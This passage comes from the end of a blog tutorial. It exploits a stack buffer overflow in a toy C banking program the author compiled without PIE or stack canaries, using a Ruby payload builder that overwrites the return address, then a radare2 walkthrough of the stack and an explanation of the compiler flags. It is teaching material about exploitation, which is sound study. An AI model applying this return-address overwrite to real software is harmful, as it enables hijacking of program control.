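  padding = "\x00".b * (RETURN_ADDR_DISTANCE - prefix.bytesize)
  payload = prefix + padding + [target].pack("Q<")

  # gets() stops reading at a newline, so 0x0a can't be part of the input.
  raise ArgumentError, "payload contains a newline byte" if payload.bytes.include?(0x0a)

  payload
end

payload = return_payload(0x00400577) # vaddr of all_accounts_balance from `is`
puts "#{payload.bytesize} bytes"
puts payload.unpack1("H*")
```

Calling File.binwrite("stdin.txt", return_payload(0x00400577)) should produce the same file as the one-liner above. If your build places all_accounts_balance at a different address, pass that address instead.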

We can now rerun r2:

$ r2 -e dbg.profile=files.rr2 -d bank_donation
>
# analyse the code
> aaa
# set a breakpoint at main
> db main
# let it continue until the breakpoint
> dc
# enter visual mode
> v!

Let's set a breakpoint before and after the gets. I expect you know how to do it by now. After setting the breakpoints, continue the execution by selecting Debug > Continue.

The stack before the gets looks as we expected:

0x7fff49c80210 0x00007fff49c80318
0x7fff49c80218 0x0000000100400490
0x7fff49c80220 0x00007fff49c80310
0x7fff49c80228 0x0000000a00000000
0x7fff49c80230 0x0000000000400630
0x7fff49c80238 0x00007f8e88dfcb97
0x7fff49c80240 0x0000000000000001
0x7fff49c80248 0x00007fff49c80318
0x7fff49c80250 0x0000000100008000
0x7fff49c80258 0x00000000004005ba
0x7fff49c80260 0x0000000000000000
0x7fff49c80268 0x051078b997922958
0x7fff49c80270 0x0000000000400490
0x7fff49c80278 0x00007fff49c80310
0x7fff49c80280 0x0000000000000000
0x7fff49c80288 0x0000000000000000

Hit continue, and let's see the stack now:

0x7fff49c80210 0x00007fff49c80318
0x7fff49c80218 0x0000000100400490
0x7fff49c80220 0x4141414149c80310
0x7fff49c80228 0x0000000800424141 ; We can see our 8
0x7fff49c80230 0x0000000000000000
0x7fff49c80238 0x0000000000400577 ; And our new return address!
0x7fff49c80240 0x0000000000000000
0x7fff49c80248 0x00007fff49c80318
0x7fff49c80250 0x0000000100008000
0x7fff49c80258 0x00000000004005ba
0x7fff49c80260 0x0000000000000000
0x7fff49c80268 0x051078b997922958
0x7fff49c80270 0x0000000000400490
0x7fff49c80278 0x00007fff49c80310
0x7fff49c80280 0x0000000000000000
0x7fff49c80288 0x0000000000000000

Now, let's add a new breakpoint right before the leave instruction, at address 0x00400620, and hit continue. We'll be stopped before the leave instruction. Keep an eye on the stack, and press s to step. See how the address of our function all_accounts_balance is now at the top of the stack. Now press s again, and see how ret takes us to our function.

If you run through the function, you'll see the output displayed on our other terminal :). The program ends in a segmentation fault because we modified the stack and left it in an invalid state.

You can quit r2 now. Also, you can run the command from the terminal and get the same result:

$ cat stdin.txt | ./bank_donation
Welcome to Shadee Bank
Account number to deposit (8) digits: Deposited: 8, into account: AAAAAAB.
Thanks, bye.
ALL ACCOUNTS:
Balance
Segmentation fault (core dumped)

Alright, that's it for this post.

Final thoughts

We covered a lot of topics, and we didn't go deep on any of them. As you can see, there is a lot to explore. I hope this helps you get started.

I told you I was going to explain the command we used to compile our code:

$ gcc -no-pie -fno-stack-protector -o bank_donation bank_donation.c

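Now we have more context and can talk about what those two flags do:

  1. -no-pie tells gcc not to build a position-independent executable. The code is then loaded at a fixed address, which is why all_accounts_balance was always at 0x00400577 and we could hardcode that address in our input.
  2. -fno-stack-protector disables the stack protector (also known as a stack canary). With the protector enabled, the compiler places a guard value between the local variables and the return address and checks it before returning, so an overflow like ours is detected and the program aborts instead of jumping to our address.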

As you can see, there are many safety guards now against buffer overflows, but they still exist, so it's good to know how they work.

I hope you enjoyed this post. As always, feedback is welcomed.



** If you want to check what else I'm currently doing, be sure to follow me on twitter @rderik or subscribe to the newsletter. If you want to send me a direct message, you can send it to derik@rderik.com.